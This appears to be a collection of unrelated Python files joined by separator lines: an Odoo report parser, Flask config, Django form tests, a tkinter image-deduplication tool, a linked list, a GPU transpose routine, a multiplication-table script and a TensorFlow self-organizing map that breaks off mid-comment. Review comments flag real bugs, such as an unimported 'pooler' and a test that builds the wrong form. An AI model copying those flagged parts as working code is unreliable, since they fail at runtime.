# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.report import report_sxw
class spm_report(report_sxw.rml_parse):
    """RML parser for the stock-picking serial-number report."""
    def __init__(self, cr, uid, name, context=None):
        if context is None:
            context = {}
        super(spm_report, self).__init__(cr, uid, name, context=context)
        # Helpers exposed to the RML template.
        self.localcontext.update({
            'time': time,
            'get_psm': self.get_psm,
        })
    def get_psm(self, pickings):
        """For each product on the picking(s): its name, serial count, and
        the serial numbers joined with ' | '.

        NOTE(review): ``pooler`` is not imported anywhere in this module, so
        the first line raises NameError at runtime -- likely a missing
        ``from openerp import pooler`` (or use ``self.pool``); confirm.
        Also note ``picking`` in the second loop is whatever value the first
        loop left in the variable, not each picking in turn -- verify intended.
        """
        pool = pooler.get_pool(self.cr.dbname)
        products = []
        res = []
        aux = []
        # Collect the distinct products across all pickings' move lines.
        for picking in pickings:
            ml_ids = picking.move_lines
            for ml_id in ml_ids:
                products.append(ml_id.product_id)
        products = list(set(products))
        for product in products:
            aux = self._get_serial(picking, product)
            if aux:
                val = {
                    'product': pool.get('product.product').browse(self.cr, self.uid, [product.id])[0].name,
                    'nro_prod': len(aux),
                    'serial': ' | '.join(aux)
                }
                if val:
                    res.append(val)
                val = {}
        return res
    def _get_serial(self, picking, product):
        """Return the serial/lot names present on *picking* for *product*."""
        res = []
        ml_ids = picking.move_lines
        for ml_id in ml_ids:
            if ml_id.product_id == product:
                if ml_id.prodlot_id.name:
                    res.append(ml_id.prodlot_id.name)
        return res
report_sxw.report_sxw('report.spm_report',
'stock.picking',
'addons/psm/report/picking.rml',
parser=spm_report)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from datetime import date
import pandas as pd
# Print today's date formatted as dd/mm/YYYY.
# NOTE(review): pandas is imported but unused in this snippet.
today = date.today()
d1 = today.strftime("%d/%m/%Y")
print("Today's date:", d1)
import os
# Adapted from Miguel Grinberg: Flask Web Development, Second Edition (O'Reilly).
class Config:
    """Base configuration; values are read from the environment at import time.

    JWT_SECRET_KEY and LOG_FILE_PATH are required (KeyError when missing);
    SENTRY_DSN is optional (None when unset).
    """
    DEBUG = False
    TESTING = False
    JWT_SECRET_KEY = os.environ['JWT_SECRET_KEY']
    LOG_FILE_PATH = os.environ['LOG_FILE_PATH']
    SENTRY_DSN = os.getenv('SENTRY_DSN')
    @staticmethod
    def init_app(app):
        # Hook for config-specific app initialisation; subclasses may override.
        pass
class DevelopmentConfig(Config):
    """Development profile: debug on, dev database (DEV_DATABASE_URI required)."""
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = os.environ['DEV_DATABASE_URI']
class TestingConfig(Config):
    """Testing profile: TESTING flag on, test database (TEST_DATABASE_URI required)."""
    TESTING = True
    SQLALCHEMY_DATABASE_URI = os.environ['TEST_DATABASE_URI']
class ProductionConfig(Config):
    """Production profile: production database (DATABASE_URI required)."""
    SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URI']
# Name -> config class map used by the app factory; 'default' is development.
config = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
    'production': ProductionConfig,
    'default': DevelopmentConfig
}
|
from django.test import TestCase
from calc.forms import INVALID_INPUT_ERROR, CalcInjForm, CRISimpleForm, CRIAdvancedForm, CRICPRForm, CRIMetoclopramideForm
class CalcInjFormTest(TestCase):
    """Validation tests for the single-field injection calculator form."""
    def test_form_rejects_non_numeric_input(self):
        form = CalcInjForm(data={'weight': 'a string'})
        self.assertFalse(form.is_valid())
        self.assertEqual(form.errors['weight'], [INVALID_INPUT_ERROR])
    def test_form_rejects_empty_string(self):
        form = CalcInjForm(data={'weight': ''})
        self.assertFalse(form.is_valid())
class CRISimpleFormTest(TestCase):
    """Validation tests for the simple CRI form."""
    def test_form_rejects_non_numeric_input(self):
        form = CRISimpleForm(data={'weight': 'a string'})
        self.assertFalse(form.is_valid())
        self.assertEqual(form.errors['weight'], [INVALID_INPUT_ERROR])
    def test_form_rejects_empty_string(self):
        form = CRISimpleForm(data={'weight': ''})
        self.assertFalse(form.is_valid())
class CRIAdvancedFormTest(TestCase):
    """Validation tests for the advanced CRI form (weight/rate/vol/infusion)."""
    def test_form_rejects_non_numeric_input(self):
        form = CRIAdvancedForm(data={'weight': 'wait',
                                     'rate': 'eight',
                                     'vol': 'volume',
                                     'infusion': 'fusion'})
        self.assertFalse(form.is_valid())
    def test_form_rejects_empty_string(self):
        form = CRIAdvancedForm(data={'weight': '',
                                     'rate': '',
                                     'vol': '',
                                     'infusion': ''})
        self.assertFalse(form.is_valid())
class CRIInsulinFormTest(TestCase):
    """Validation tests for the insulin CRI form.

    NOTE(review): both tests instantiate CRIAdvancedForm, and no insulin form
    is imported at the top of this file -- this looks like a copy-paste from
    CRIAdvancedFormTest (the 'replacement' key is simply ignored by that
    form); confirm which form class was intended.
    """
    def test_form_rejects_non_numeric_input(self):
        form = CRIAdvancedForm(data={'weight': 'wait',
                                     'rate': 'eight',
                                     'vol': 'volume',
                                     'replacement': 'enplacement'})
        self.assertFalse(form.is_valid())
    def test_form_rejects_empty_string(self):
        form = CRIAdvancedForm(data={'weight': '',
                                     'rate': '',
                                     'vol': '',
                                     'replacement': ''})
        self.assertFalse(form.is_valid())
class CRICPRFormTest(TestCase):
    """Validation tests for the CPR CRI form (three drug-dose fields)."""
    def test_form_rejects_non_numeric_input(self):
        form = CRICPRForm(data={'weight': 'wait',
                                'rate': 'eight',
                                'vol': 'volume',
                                'dobutamine': 'nobutamine',
                                'dopamine': 'nopamine',
                                'lidocaine': 'hidocaine'})
        self.assertFalse(form.is_valid())
    def test_form_rejects_empty_string(self):
        form = CRICPRForm(data={'weight': '',
                                'rate': '',
                                'vol': '',
                                'dobutamine': '',
                                'dopamine': '',
                                'lidocaine': ''})
        self.assertFalse(form.is_valid())
class CRIMetoclopramideTest(TestCase):
    """Validation tests for the metoclopramide CRI form; the two inc_* fields
    are optional while the base fields are required."""
    def test_form_rejects_non_numeric_input(self):
        form = CRIMetoclopramideForm(data={'weight': 'wait',
                                           'rate': 'eight',
                                           'volume': 'volume',
                                           'infusion': 'fusion',
                                           'inc_volume': 'volume',
                                           'inc_infusion': 'fusion'})
        self.assertFalse(form.is_valid())
    def test_form_rejects_empty_string(self):
        # Empty required fields invalidate the form even when the optional
        # inc_* fields are populated.
        form = CRIMetoclopramideForm(data={'weight': '',
                                           'rate': '',
                                           'volume': '',
                                           'infusion': '',
                                           'inc_volume': 100,
                                           'inc_infusion': 1})
        self.assertFalse(form.is_valid())
    def test_increase_volume_and_infusion_fields_are_optional(self):
        form = CRIMetoclopramideForm(data={'weight': 4.0,
                                           'rate': 10,
                                           'volume': 100,
                                           'infusion': 4,
                                           'inc_volume': '',
                                           'inc_infusion': ''})
        self.assertTrue(form.is_valid())
|
import datetime
import glob
import json
from threading import *
from tkinter import *
from tkinter import filedialog as fd
import cv2
from skimage.metrics import structural_similarity
# Variables and Objects
global imageFilesInWorkingFolder
pathToWorkingFolder = ""
image_score_dict = {}
# Searches through the designated work path and adds all files with specific post-fix to a list
def listOfAllImageFiles():
    """Recursively collect .png/.jpg/.jpeg paths under pathToWorkingFolder
    into the global imageFilesInWorkingFolder, updating the status label
    once per extension pass."""
    global imageFilesInWorkingFolder
    # BUG FIX: the list was reset to "" (a str) before being rebound; start
    # from an empty list directly.  The three near-identical glob passes are
    # folded into one loop, keeping the 1/3..3/3 status messages.
    imageFilesInWorkingFolder = []
    for step, pattern in enumerate(("*.png", "*.jpg", "*.jpeg"), start=1):
        labelStatus.config(text="Searching for viable images {}/3".format(step))
        tk_root.update_idletasks()
        imageFilesInWorkingFolder += glob.glob(
            pathToWorkingFolder + "/**/" + pattern, recursive=True)
    print(imageFilesInWorkingFolder)
# adds the path of imageA to the dictionary. imageA shall be the path and therefore an unique ID. this method
# is needed to access the "key" imageA and append the paths of similar images
def createNewKeyInDict(key, dict):
    """Register image path *key* in *dict* with an empty (path, score) list."""
    dict[key] = list()
# appends a value to the key of the dictionary
def addValueToDictKey(key, value, score, dict):
    """Append the (value, score) match pair to the list stored under *key*."""
    match = (value, score)
    dict[key].append(match)
def checkDictForExistingKeys(key):
    """Return True if *key* is already tracked in the global image_score_dict."""
    # Idiom: direct membership test instead of if/else over boolean literals.
    return key in image_score_dict
def checkDictForExistingValues(value, dict):
    """Return True if image path *value* already appears as a recorded match
    in any of *dict*'s (path, score) lists.

    BUG FIX: the original had the else-clause attached to the `if` inside the
    loop, returning False after inspecting only the first dict entry, and it
    tested `value in i` against a list of (path, score) tuples -- a bare path
    never equals a 2-tuple, so it could never return True.
    """
    for matches in dict.values():
        for stored_path, _score in matches:
            if stored_path == value:
                return True
    return False
def dumpToJSON():
    """Write the accumulated duplicate map to 1_duplicates.json in the
    working folder (overwrites any previous dump)."""
    global image_score_dict
    with open(pathToWorkingFolder + "/1_duplicates.json", 'w') as outfile:
        json.dump(image_score_dict, outfile)
# Essentially takes all the filenames in the specified folder and runs it through the imageComparison Algorithm.
# It then fills a dictionary with images and their duplicates
def startSearchForDupes():
    """Compare every pair of images in the working folder with SSIM and
    record likely duplicates as (path, score) in image_score_dict, then dump
    the result to JSON.

    Runs on a worker thread (see startSearchThreading); updates the GUI
    status labels as it progresses.
    """
    start = datetime.datetime.now()
    labelStatus.config(text="Start Scan")
    tk_root.update_idletasks()  # updates GUI
    imageSize = (200, 200)  # images are normalised to this size before comparison
    tk_root.update_idletasks()
    listOfAllImageFiles()
    for i in range(0, len(imageFilesInWorkingFolder)):
        imageA = cv2.imread(str(imageFilesInWorkingFolder[i]))
        try:
            imageA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
        except Exception as e:
            print("Color to Gray not possible: " + str(imageA) + str(e))
        try:
            imageA = cv2.resize(imageA, imageSize)
        except Exception as e:
            print("Resizing not possible: " + str(imageA) + str(e))
        for j in range(1 + i, len(imageFilesInWorkingFolder)):
            labelStatus.config(text="File: " + str(i + 1) + " of: " + str(len(imageFilesInWorkingFolder))
                               + " | Cycle: " + str(j + 1) + " of: " + str(len(imageFilesInWorkingFolder)))
            tk_root.update_idletasks()  # updates GUI
            # Skip images already recorded as someone's duplicate.
            if not checkDictForExistingValues(imageFilesInWorkingFolder[j], image_score_dict):
                imageB = cv2.imread(str(imageFilesInWorkingFolder[j]))
                try:
                    imageB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
                except Exception as e:
                    print("Color to Gray not possible: " + str(imageB) + str(e))
                try:
                    imageB = cv2.resize(imageB, imageSize)
                except Exception as e:
                    print("Resizing not possible: " + str(imageB) + str(e))
                try:
                    (score, diff) = structural_similarity(imageA, imageB, multichannel=True, full=True)
                except Exception as e:
                    # BUG FIX: previously a failed comparison fell through and
                    # recorded an unbound (first pair) or stale (later pairs)
                    # `score`; skip this pair instead.
                    print("Error checking for similarities" + str(e))
                    continue
                if not checkDictForExistingKeys(imageFilesInWorkingFolder[i]):
                    createNewKeyInDict(imageFilesInWorkingFolder[i], image_score_dict)
                addValueToDictKey(imageFilesInWorkingFolder[i], imageFilesInWorkingFolder[j], score, image_score_dict)
    finish = datetime.datetime.now()
    labelTimeLeft.config(text="Time spend: " + str(finish - start))
    tk_root.update_idletasks()  # updates GUI
    labelStatus.config(text="Task Done in: " + pathToWorkingFolder)
    tk_root.update_idletasks()  # updates GUI
    dumpToJSON()
    finish = datetime.datetime.now()
    labelTimeLeft.config(text="Total Time: " + str(finish - start))
    tk_root.update_idletasks()  # updates GUI
# Quit Program with shortcut
def quitProgram(event):
    """Exit handler bound to Ctrl+Q; terminates the process with a message
    describing the triggering event.

    BUG FIX: `sys` was referenced without ever being imported in this module
    (only datetime/glob/json/threading/tkinter/cv2/skimage are imported), so
    pressing Ctrl+Q raised NameError instead of quitting.
    """
    import sys
    sys.exit("ShortCut Quit: Event Message: " + str(event))
def choseFolder():
    """Ask the user for a working directory and remember it module-wide."""
    global pathToWorkingFolder
    selected = fd.askdirectory()
    pathToWorkingFolder = selected
    labelStatus.config(text="Folder Selected: " + selected)
    tk_root.update_idletasks()
def startSearchThreading():
    """Run the duplicate scan on a worker thread so the GUI stays responsive."""
    worker = Thread(target=startSearchForDupes)
    worker.start()
# GUI construction (module runs as a script; widgets are module-level)
# tk root
tk_root = Tk()
tk_root.geometry("450x120")
tk_root.bind("<Control-q>", quitProgram)  # binding shortcut ctrl+q to function quitProgram()
tk_root.title("DeDup 1.0")
# Gets both half the screen width/height and window width/height
positionRight = int((tk_root.winfo_screenwidth() / 2) - tk_root.winfo_reqwidth())
positionDown = int((tk_root.winfo_screenheight() / 2) - tk_root.winfo_reqheight())
# Positions the window in the center of the page.
tk_root.geometry("+{}+{}".format(positionRight, positionDown))
# Buttons.  BUG FIX: the folder button used to be assigned to the name
# `choseFolder`, shadowing the choseFolder() callback defined above (it only
# worked because command= was bound before the rebinding).  Distinct widget
# names remove the shadowing.
choseFolderButton = Button(tk_root, text="Chose Folder", command=choseFolder)
startScanButton = Button(tk_root, text="Start Scan", command=startSearchThreading)
# Labels
labelHeadline = Label(tk_root, text="Image Dedup by Image Content")
labelStatus = Label(tk_root, text="Not in progress")
labelTimeLeft = Label(tk_root, text="Time Spend")
# packing
labelHeadline.pack()
choseFolderButton.pack()
startScanButton.pack()
labelStatus.pack()
labelTimeLeft.pack()
# GUI loop
mainloop()
|
class Node:
    """A single element of a doubly linked list, holding one value plus
    links to its neighbours (None when the node is detached or terminal)."""

    def __init__(self, data):
        self.data = data
        self.prev = None
        self.next = None
class DoublyLinkedList:
    """Doubly linked list of Node objects tracked by a head pointer.

    Bug fixes relative to the original implementation:
    * print_list no longer crashes (AttributeError) on an empty list.
    * add_after_node no longer loops forever when ``data == key``.
    * delete/delete_node share one _unlink helper instead of ~40 duplicated
      lines, and remove_duplicates unlinks directly instead of rescanning
      the list from the head for every removal.
    """

    def __init__(self):
        self.head = None

    def print_list(self):
        """Print the list as 'a -> b -> c'; prints nothing when empty."""
        if self.head is None:
            return
        cur = self.head
        while cur.next:
            print(cur.data, '-> ', end="")
            cur = cur.next
        print(cur.data)

    def append(self, data) -> None:
        """Add a new node holding *data* at the end of the list."""
        new_node = Node(data)
        if self.head is None:
            self.head = new_node
            return
        tail = self.head
        while tail.next:
            tail = tail.next
        tail.next = new_node
        new_node.prev = tail

    def prepend(self, data):
        """Add a new node holding *data* at the front of the list."""
        new_node = Node(data)
        if self.head is not None:
            new_node.next = self.head
            self.head.prev = new_node
        self.head = new_node

    def add_after_node(self, key, data):
        """Insert *data* after every node whose value equals *key*.

        Appending after the tail delegates to append() and stops the scan,
        matching the original behaviour.
        """
        cur = self.head
        while cur:
            if cur.data == key:
                if cur.next is None:  # key is the tail node
                    self.append(data)
                    return
                new_node = Node(data)
                nxt = cur.next
                cur.next = new_node
                new_node.prev = cur
                new_node.next = nxt
                nxt.prev = new_node
                # Resume AFTER the inserted node; resuming at it looped
                # forever when data == key.
                cur = nxt
            else:
                cur = cur.next

    def add_before_node(self, key, data):
        """Insert *data* before every node whose value equals *key*.

        Inserting before the head delegates to prepend() and stops the scan,
        matching the original behaviour.
        """
        cur = self.head
        while cur:
            if cur.data == key:
                if cur.prev is None:  # key is the head node
                    self.prepend(data)
                    return
                new_node = Node(data)
                prev = cur.prev
                prev.next = new_node
                new_node.prev = prev
                new_node.next = cur
                cur.prev = new_node
            cur = cur.next

    def _unlink(self, node):
        """Detach *node* (known to be in this list) and clear its links."""
        if node is self.head:
            self.head = node.next
        if node.prev:
            node.prev.next = node.next
        if node.next:
            node.next.prev = node.prev
        node.prev = None
        node.next = None

    def delete(self, key):
        """Delete the first node whose value equals *key* (no-op if absent)."""
        cur = self.head
        while cur:
            if cur.data == key:
                self._unlink(cur)
                return
            cur = cur.next

    def delete_node(self, node: Node):
        """Delete *node* if it is present in the list (no-op otherwise)."""
        cur = self.head
        while cur:
            if cur is node:  # identity, as in the original == on Node objects
                self._unlink(cur)
                return
            cur = cur.next

    def reverse(self):
        """Reverse the list in place by swapping prev/next on every node."""
        tmp = None
        cur = self.head
        while cur:
            tmp = cur.prev
            cur.prev = cur.next
            cur.next = tmp
            # prev now points at the node that used to be next
            cur = cur.prev
        if tmp:
            self.head = tmp.prev

    def remove_duplicates(self):
        """Keep only the first occurrence of each value (values must be
        hashable, as in the original dict-based version)."""
        seen = set()
        cur = self.head
        while cur:
            nxt = cur.next
            if cur.data in seen:
                self._unlink(cur)
            else:
                seen.add(cur.data)
            cur = nxt

    def pairs_with_sum(self, sum_val):
        """Return all (a, b) value pairs with a before b and a + b == sum_val."""
        pairs = []
        p = self.head
        while p:
            q = p.next
            while q:
                if p.data + q.data == sum_val:
                    pairs.append((p.data, q.data))
                q = q.next
            p = p.next
        return pairs
# Demo / smoke test: the expected list contents after each step are noted inline.
dllist = DoublyLinkedList()
dllist.append(1)
dllist.append(2)
dllist.append(3)
dllist.append(4)
dllist.prepend(5)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 4
dllist.add_after_node(3, 10)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 10 -> 4
dllist.add_after_node(4, 7)
dllist.print_list() # 5 -> 1 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.add_before_node(2, 6)
dllist.print_list() # 5 -> 1 -> 6 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(5)
dllist.print_list() # 1 -> 6 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(6)
dllist.print_list() # 1 -> 2 -> 3 -> 10 -> 4 -> 7
dllist.delete(7)
dllist.print_list() # 1 -> 2 -> 3 -> 10 -> 4
dllist.delete(10)
dllist.print_list() # 1 -> 2 -> 3 -> 4
dllist.reverse()
dllist.print_list() # 4 -> 3 -> 2 -> 1
dllist.append(1)
dllist.append(2)
dllist.append(5)
dllist.append(4)
dllist.print_list() # 4 -> 3 -> 2 -> 1 -> 1 -> 2 -> 5 -> 4
dllist.remove_duplicates()
dllist.print_list() # 4 -> 3 -> 2 -> 1 -> 5
print(dllist.pairs_with_sum(5))
|
import numpy
from tigger.helpers import *
from tigger.core import *
TEMPLATE = template_for(__file__)
def transpose_shape(shape, axes):
    """Return *shape* reordered according to the axis permutation *axes*."""
    reordered = []
    for axis in axes:
        reordered.append(shape[axis])
    return tuple(reordered)
def transpose(axes, b_start, c_start):
    """Return *axes* with the [b_start:c_start) slice moved to the end,
    i.e. the permutation produced by one block transpose."""
    head = axes[:b_start]
    middle = axes[b_start:c_start]
    tail = axes[c_start:]
    return head + tail + middle
def possible_transposes(n):
    """Yield every index pair (b, c) with 0 <= b < c < n."""
    for first in range(n - 1):
        for second in range(first + 1, n):
            yield first, second
def get_operations(source, target):
    # Depth-first search for a shortest sequence of (b, c) block-transpose
    # operations turning the axis permutation `source` into `target`.
    # `visited` is shared across the whole search to prune repeated states.
    visited = set([source])
    actions = list(possible_transposes(len(source)))
    def traverse(node, breadcrumbs, current_best):
        # Prune: a path already as long as the best known solution cannot win.
        if current_best is not None and len(breadcrumbs) >= len(current_best):
            return current_best
        for b, c in actions:
            result = transpose(node, b, c)
            # Revisiting a permutation cannot yield a shorter path — unless it
            # is the target itself, which must still be allowed to complete.
            if result in visited and result != target:
                continue
            visited.add(result)
            new_breadcrumbs = breadcrumbs + ((b, c),)
            if result == target:
                if current_best is None or len(current_best) > len(new_breadcrumbs):
                    return new_breadcrumbs
            current_best = traverse(result, new_breadcrumbs, current_best)
        return current_best
    return traverse(source, tuple(), None)
def get_transposes(shape, axes=None):
    """Decompose the axis permutation *axes* applied to *shape* into a list
    of elementary (batch, height, width) matrix-transpose steps.

    BUG FIX: the original evaluated ``len(axes)`` and ``reversed(axes)``
    before applying the ``axes is None`` default, so calling without *axes*
    raised TypeError.  The identity permutation is now derived from *shape*,
    and the default (as in numpy.transpose) reverses the axis order.
    """
    source = tuple(range(len(shape)))
    if axes is None:
        axes = tuple(reversed(source))
    else:
        # Normalise to a tuple so prefix comparisons against `source` work
        # even when a list is passed.
        axes = tuple(axes)
        assert set(source) == set(axes)
    # Axes in the longest common prefix never move; solve only the suffix.
    for i in range(len(source) - 1, 0, -1):
        if source[:i] == axes[:i]:
            result = get_operations(source[i:], axes[i:])
            prefix = source[:i]
            break
    else:
        result = get_operations(source, axes)
        prefix = tuple()
    # Shift suffix-relative operations back into absolute axis indices.
    operations = [(b + len(prefix), c + len(prefix)) for b, c in result]
    transposes = []
    for b, c in operations:
        transposes.append((product(shape[:b]), product(shape[b:c]), product(shape[c:])))
        shape = transpose(shape, b, c)
    return transposes
class Transpose(Computation):
    """
    Changes the order of axes in a multidimensional array.
    Works analogous to :py:func:`numpy.transpose`.
    .. py:method:: prepare_for(output, input, axes=None)
    :param output: output array
    :param input: input array
    :param axes: tuple with the new axes order.
    If ``None``, then axes will be reversed.
    """
    def _get_argnames(self):
        # One output array, one input array, no scalar parameters.
        return ('output',), ('input',), tuple()
    def _get_basis_for(self, output, input, axes=None, block_width_override=None):
        # Collect everything the kernels need into the basis structure.
        bs = AttrDict(block_width_override=block_width_override)
        assert output.dtype is None or output.dtype == input.dtype
        bs.dtype = input.dtype
        bs.input_shape = input.shape
        # A transpose only reorders elements, so the total sizes must agree.
        assert product(output.shape) == product(input.shape)
        if axes is None:
            # Default mirrors numpy.transpose: reverse the axis order.
            axes = tuple(reversed(range(len(input.shape))))
        else:
            assert set(axes) == set(range(len(input.shape)))
        bs.axes = tuple(axes)
        return bs
    def _get_argvalues(self, basis):
        output_shape = transpose_shape(basis.input_shape, basis.axes)
        return dict(
            output=ArrayValue(output_shape, basis.dtype),
            input=ArrayValue(basis.input_shape, basis.dtype))
    def _add_transpose(self, operations, basis, device_params,
            output_name, input_name, batch, input_height, input_width):
        # Schedule one kernel that transposes `batch` matrices of size
        # input_height x input_width, tiled into block_width^2 work groups.
        bso = basis.block_width_override
        block_width = device_params.local_mem_banks if bso is None else bso
        if block_width ** 2 > device_params.max_work_group_size:
            # If it is not CPU, current solution may affect performance
            block_width = int(numpy.sqrt(device_params.max_work_group_size))
        blocks_per_matrix = min_blocks(input_height, block_width)
        grid_width = min_blocks(input_width, block_width)
        render_kwds = dict(
            input_width=input_width, input_height=input_height, batch=batch,
            block_width=block_width,
            grid_width=grid_width,
            blocks_per_matrix=blocks_per_matrix)
        operations.add_kernel(
            TEMPLATE, 'transpose', [output_name, input_name],
            global_size=(grid_width * block_width, blocks_per_matrix * batch * block_width),
            local_size=(block_width, block_width),
            render_kwds=render_kwds)
    def _construct_operations(self, basis, device_params):
        operations = self._get_operation_recorder()
        transposes = get_transposes(basis.input_shape, basis.axes)
        temp_shape = (product(basis.input_shape),)
        # Chain the elementary transposes: direct for one step, a single
        # temporary for two, and two ping-pong temporaries for longer chains.
        if len(transposes) == 1:
            args = [('output', 'input')]
        elif len(transposes) == 2:
            tr_temp = operations.add_allocation(temp_shape, basis.dtype)
            args = [
                (tr_temp, 'input'),
                ('output', tr_temp)
            ]
        else:
            tnames = [
                operations.add_allocation(temp_shape, basis.dtype),
                operations.add_allocation(temp_shape, basis.dtype)]
            iname = 'input'
            oname = tnames[0]
            args = [(oname, iname)]
            other_tname = lambda name: tnames[0] if name == tnames[1] else tnames[1]
            for i in range(1, len(transposes)):
                iname = oname
                # The final step writes straight into 'output'.
                oname = 'output' if i == len(transposes) - 1 else other_tname(iname)
                args.append((oname, iname))
        for tr, arg_pair in zip(transposes, args):
            batch, height, width = tr
            oname, iname = arg_pair
            self._add_transpose(operations, basis, device_params,
                oname, iname, batch, height, width)
        return operations
|
# Read the number whose multiplication table should be printed.
num=int(input("Enter no. :"))
i=1  # first row of the table
def tabel(i, num):
    """Print the multiplication table of *num* from row *i* up to row 10.

    Returns 1 once *i* is past 10 (the recursion's base case), otherwise
    prints the remaining rows and returns None.
    """
    if i > 10:
        return 1
    for row in range(i, 11):
        print("{} * {} = {}".format(num, row, num * row))
# Print rows i..10 of the table for num.
tabel(i, num)
|
import tensorflow as tf
import numpy as np
import pickle
class SOM(object):
    """2-D Self-Organizing Map trained with the classic Kohonen update rule.

    Built on TensorFlow 1.x graph/session APIs (tf.placeholder, tf.Session,
    tf.initialize_all_variables); it will not run under TF 2.x without the
    tf.compat.v1 shims.
    """
    #To check if the SOM has been trained
    _trained = False
    def __init__(self, m, n, dim, n_iterations=100, alpha=None, sigma=None):
        # m x n is the neuron grid; dim is the input vector dimensionality.
        self._m = m
        self._n = n
        if alpha is None:
            alpha = 0.3  # default initial learning rate
        else:
            alpha = float(alpha)
        if sigma is None:
            # Default neighbourhood radius: half the larger grid side.
            sigma = max(m, n) / 2.0
        else:
            sigma = float(sigma)
        self._n_iterations = abs(int(n_iterations))
        self._graph = tf.Graph()
        with self._graph.as_default():
            # One weight vector per neuron, randomly initialised.
            self._weightage_vects = tf.Variable(tf.random_normal(
                [m*n, dim]))
            # Grid coordinates (i, j) of every neuron, in the same order.
            self._location_vects = tf.constant(np.array(
                list(self._neuron_locations(m, n))))
            # A single training sample and the iteration number are fed per step.
            self._vect_input = tf.placeholder("float", [dim])
            self._iter_input = tf.placeholder("float")
            # Best Matching Unit: the neuron whose weights are closest (L2)
            # to the current input vector.
            bmu_index = tf.argmin(tf.sqrt(tf.reduce_sum(
                tf.pow(tf.subtract(self._weightage_vects, tf.stack(
                    [self._vect_input for i in range(m*n)])), 2), 1)),
                                  0)
            # Turn the flat BMU index into its (row, col) grid location.
            slice_input = tf.pad(tf.reshape(bmu_index, [1]),
                                 np.array([[0, 1]]))
            bmu_loc = tf.reshape(tf.slice(self._location_vects, slice_input,
                                          tf.constant(np.array([1, 2]))),
                                 [2])
            # Learning rate and neighbourhood radius decay linearly over time.
            learning_rate_op = tf.subtract(1.0, tf.div(self._iter_input,
                                                       self._n_iterations))
            _alpha_op = tf.multiply(alpha, learning_rate_op)
            _sigma_op = tf.multiply(sigma, learning_rate_op)
            # Gaussian neighbourhood function centred on the BMU location.
            bmu_distance_squares = tf.reduce_sum(tf.pow(tf.subtract(
                self._location_vects, tf.stack(
                    [bmu_loc for i in range(m*n)])), 2), 1)
            neighbourhood_func = tf.exp(tf.negative(tf.div(tf.cast(
                bmu_distance_squares, "float32"), tf.pow(_sigma_op, 2))))
            learning_rate_op = tf.multiply(_alpha_op, neighbourhood_func)
            # Per-neuron learning rate broadcast to the weight dimension.
            learning_rate_multiplier = tf.stack([tf.tile(tf.slice(
                learning_rate_op, np.array([i]), np.array([1])), [dim])
                for i in range(m*n)])
            # Kohonen update: move each neuron's weights toward the input,
            # scaled by its neighbourhood-weighted learning rate.
            weightage_delta = tf.multiply(
                learning_rate_multiplier,
                tf.subtract(tf.stack([self._vect_input for i in range(m*n)]),
                            self._weightage_vects))
            new_weightages_op = tf.add(self._weightage_vects,
                                       weightage_delta)
            self._training_op = tf.assign(self._weightage_vects,
                                          new_weightages_op)
            self._sess = tf.Session()
            init_op = tf.initialize_all_variables()
            self._sess.run(init_op)
    def _neuron_locations(self, m, n):
        # Yields grid coordinates row by row: (0,0), (0,1), ..., (m-1, n-1).
        for i in range(m):
            for j in range(n):
                yield np.array([i, j])
    def train(self, input_vects):
        """Train the map on *input_vects* for the configured iteration count,
        pickling intermediate weights/locations every other iteration."""
        for iter_no in range(self._n_iterations):
            # One SGD-style step per input vector.
            for input_vect in input_vects:
                self._sess.run(self._training_op,
                               feed_dict={self._vect_input: input_vect,
                                          self._iter_input: iter_no})
            print(iter_no/self._n_iterations)
            # save the intermediate results
            weight = []
            loc = []
            weight = (list(self._sess.run(self._weightage_vects)))
            loc = (list(self._sess.run(self._location_vects)))
            if iter_no % 2 == 1:
                # NOTE(review): assumes a 'weights/' directory already exists
                # in the working directory — open() fails otherwise; confirm.
                with open('weights/weight{}.pkl'.format(iter_no),'wb') as output:
                    pickle.dump(weight,output)
                with open('weights/loc{}.pkl'.format(iter_no),'wb') as output1:
                    pickle.dump(loc,output1)
        #Store a centroid grid for easy retrieval later on
        centroid_grid = [[] for i in range(self._m)]
        self._weightages = list(self._sess.run(self._weightage_vects))
        self._locations = list(self._sess.run(self._location_vects))
        for i, loc in enumerate(self._locations):
            centroid_grid[loc[0]].append(self._weightages[i])
        self._centroid_grid = centroid_grid
        self._trained = True
    def get_centroids(self):
        # Grid of trained weight vectors, indexed [row][col].
        if not self._trained:
            raise ValueError("SOM not trained yet")
        return self._centroid_grid
    def map_vects(self, input_vects):
        """Map each input vector to the grid location of its closest neuron."""
        if not self._trained:
            raise ValueError("SOM not trained yet")
        to_return = []
        for vect in input_vects:
            min_index = min([i for i in range(len(self._weightages))],
                            key=lambda x: np.linalg.norm(vect-
                                                         self._weightages[x]))
            to_return.append(self._locations[min_index])
        return to_return
    def map_vects_demo(self,input_vects,weights,loc):
        # Same as map_vects, but against externally supplied (e.g. pickled)
        # weights and locations instead of the trained state.
        to_return = []
        for vect in input_vects:
            min_index = min([i for i in range(len(weights))],
                            key=lambda x: np.linalg.norm(vect-
                                                         weights[x]))
            to_return.append(loc[min_index])
        return to_return
##For plotting the images
#from matplotlib import pyplot as plt
#
##Training inputs for RGBcolors
#colors = np.array(
# [[0., 0., 0.],
# [0., 0., 1.],
# [0., 0., 0.5],
# [0.125, 0.529, 1.0],
# [0.33, 0.4, 0.67],
# [0.6, 0.5, 1.0],
# [0., 1., 0.],
# [1., 0., 0.],
# [0., 1., 1.],
# [1., 0., 1.],
# [1., 1., 0.],
# [1., 1., 1.],
# [.33, .33, .33],
